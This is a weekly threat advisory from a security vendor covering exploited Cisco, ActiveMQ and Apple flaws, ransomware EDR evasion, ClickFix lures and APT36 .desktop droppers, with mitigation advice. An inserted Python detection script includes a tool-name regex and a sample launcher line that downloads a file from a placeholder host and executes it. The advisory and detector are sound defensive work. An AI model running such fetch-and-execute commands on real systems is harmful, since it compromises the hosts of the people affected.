Attackers Target Core Infrastructure with Stealth and Precision
- SISA Weekly Threat Watch -

SISA Weekly Threat Watch – our weekly feature brings you a quick snapshot of the major security vulnerabilities that posed a threat to organizations worldwide. These recurring, actionable threat advisories also provide information and recommendations to help security teams take appropriate action against the latest critical threats.
1. Critical Vulnerabilities in Foundational Network and Cloud Infrastructure
This trend highlights attacks on the core software and appliances that manage and secure enterprise networks, offering attackers a powerful foothold.
- Cisco FMC RCE (CVE-2025-20265): A critical, CVSS 10.0 vulnerability in the Firewall Management Center allows unauthenticated remote attackers to execute arbitrary commands with high privileges by sending a crafted RADIUS request, putting entire network security perimeters at risk.
- Apache ActiveMQ Exploit (CVE-2023-46604): Threat actors are actively exploiting this known critical flaw to achieve remote code execution on Linux systems, deploying the DripDropper malware. Uniquely, attackers then patch the vulnerability themselves to prevent rival groups from accessing the compromised system.
- Apple Zero-Day (CVE-2025-43300): A memory corruption flaw in the Image I/O framework affecting iOS, iPadOS, and macOS is being exploited in targeted attacks, potentially allowing remote code execution through a maliciously crafted image file.
2. Evolution of Ransomware Operations with Custom Tooling
Ransomware groups continue to refine their tradecraft, moving beyond encryption to include advanced evasion, data theft, and custom malware designed to disable modern defenses.
- Crypto24 Ransomware: This group employs custom tools like RealBlindingEDR to disable kernel drivers for major EDR/AV solutions (Trend Micro, Kaspersky, SentinelOne) and abuses legitimate uninstallers (XBCUninstaller.exe) to remove security agents. Their operations include keylogging, data exfiltration to Google Drive, and lateral movement before deploying the ransomware payload.
3. Novel Social Engineering and Fileless Execution Techniques
Attackers are developing ingenious methods to bypass technical controls by manipulating users into performing actions that initiate the attack chain, often leaving minimal forensic evidence.
- ClickFix & CORNFLAKE.V3: This technique tricks users into pasting malicious PowerShell commands into the Windows Run dialog after being lured by a fake CAPTCHA or verification page. This user action downloads and executes a powerful backdoor that supports credential theft and secondary payload delivery.
4. Geopolitical Espionage with Cross-Platform Stealth
State-sponsored actors are expanding their toolkits to target diverse operating systems, using stealthy techniques to maintain long-term persistence within victim environments.
- APT36’s .desktop File Attacks: The group targets entities with spear-phishing emails carrying ZIP archives. Inside, a .desktop launcher is disguised as a PDF; when opened, it executes commands that fetch a Go-based implant. The launcher is also configured for autostart persistence, abusing an ordinary Linux desktop feature for espionage.
- Linux VShell Backdoor: The payload delivered by the RAR filename campaign is VShell, a feature-rich, Go-based backdoor. It provides full remote control, file exfiltration, and tunneling capabilities, making it a significant threat to Linux-based infrastructure.
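A detection-side illustration of the launcher disguise described above, added here and not part of the SISA advisory or any vendor tooling: it parses a .desktop file, flags a document-style name paired with a shell or downloader in Exec=, and notes when the file sits in an autostart directory. The sample entry, its URL and the paths are constructed placeholders, not indicators from the campaign.

```python
"""Triage .desktop launchers for the disguised-document pattern above (constructed defender example, not SISA's tooling)."""
import configparser
import re
from pathlib import Path

# Exec= content that a launcher posing as a document has no reason to contain
SHELL_OR_FETCH_RE = re.compile(r"(?:^|\s)(curl|wget|bash\s+-c|sh\s+-c|python3?\s+-c|base64\s+-d)\b")
DOC_EXT_RE = re.compile(r"\.(pdf|docx?|xlsx?|pptx?)$", re.IGNORECASE)

def parse_desktop_entry(text: str) -> dict:
    cp = configparser.RawConfigParser(strict=False, delimiters=("=",))
    cp.optionxform = str  # keep key case: Exec, not exec
    try:
        cp.read_string(text)
    except configparser.Error:
        return {}  # not a parseable key-file (garbage, or no [group] header)
    return dict(cp["Desktop Entry"]) if cp.has_section("Desktop Entry") else {}

def assess_launcher(path, text: str) -> list[str]:
    """Reasons a launcher looks like a disguised dropper; an empty list means nothing odd."""
    path, entry = Path(path), parse_desktop_entry(text)
    findings = []
    # A Name or filename ending in a document extension on something that executes
    if DOC_EXT_RE.search(entry.get("Name", "")) or DOC_EXT_RE.search(path.stem):
        findings.append("document-style name on an executable launcher")
    if SHELL_OR_FETCH_RE.search(entry.get("Exec", "")):
        findings.append("Exec runs a shell or downloader")
        if entry.get("Terminal", "false").lower() == "false":
            findings.append("command runs with no visible terminal")
    # The persistence half of the technique: the launcher sits in an autostart directory
    if findings and path.parent.name == "autostart":
        findings.append("registered for autostart persistence")
    return findings

def scan_directory(directory) -> dict[str, list[str]]:
    """Map each flagged .desktop file under directory (e.g. ~/.config/autostart) to its findings."""
    results = {}
    for desktop in Path(directory).rglob("*.desktop"):
        findings = assess_launcher(desktop, desktop.read_text(errors="replace"))
        if findings:
            results[str(desktop)] = findings
    return results

# Constructed sample: placeholder URL and paths, not real indicators from the campaign
SUSPICIOUS_SAMPLE = """[Desktop Entry]
Type=Application
Name=Invoice.pdf
Terminal=false
Exec=bash -c "curl -fsSL http://placeholder.invalid/x -o /tmp/.c && chmod +x /tmp/.c && /tmp/.c"
"""
```

Run scan_directory over ~/.config/autostart and /etc/xdg/autostart as a periodic host check; a clean system returns an empty mapping.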
Proactive steps for the week
- Prioritize Emergency Patching: Immediately apply available patches for critical vulnerabilities, focusing on Cisco FMC (CVE-2025-20265) and Apple devices (CVE-2025-43300), and ensure all Apache ActiveMQ instances are fully updated.
- Enforce Strict Access Controls: Restrict administrative access to critical management interfaces (e.g., FMC, VMware) using network segmentation and firewall rules that only permit connections from trusted, authorized IP ranges.
- Audit and Harden Authentication: Review and secure RADIUS configurations. Scrutinize Linux PAM modules and SSH settings for unauthorized changes. Enforce phishing-resistant MFA (like number matching) on all cloud and privileged accounts.
- Monitor for Legitimate Tool Abuse: Implement alerts for the unexpected use of system utilities (e.g., XBCUninstaller.exe, Quick Assist) and the installation of unauthorized Remote Monitoring and Management (RMM) software.
- Launch Targeted Security Training: Immediately educate users and IT staff on the “ClickFix” technique, training them to never paste commands from unsolicited sources and to be wary of archive attachments (.ZIP, .RAR) from unknown senders.
- Block High-Risk Network Traffic: Enforce egress filtering and monitor outbound connections to cloud services and channels (Google Drive, Dropbox, WebSockets) for signs of data exfiltration or covert command-and-control activity.
To get daily updates on the critical vulnerabilities being exploited by threat actors, subscribe to SISA Daily Threat Watch – our daily actionable threat advisories.
For a deeper understanding of how you can prevent these threats from affecting your organization, request a call to get in touch with our experts.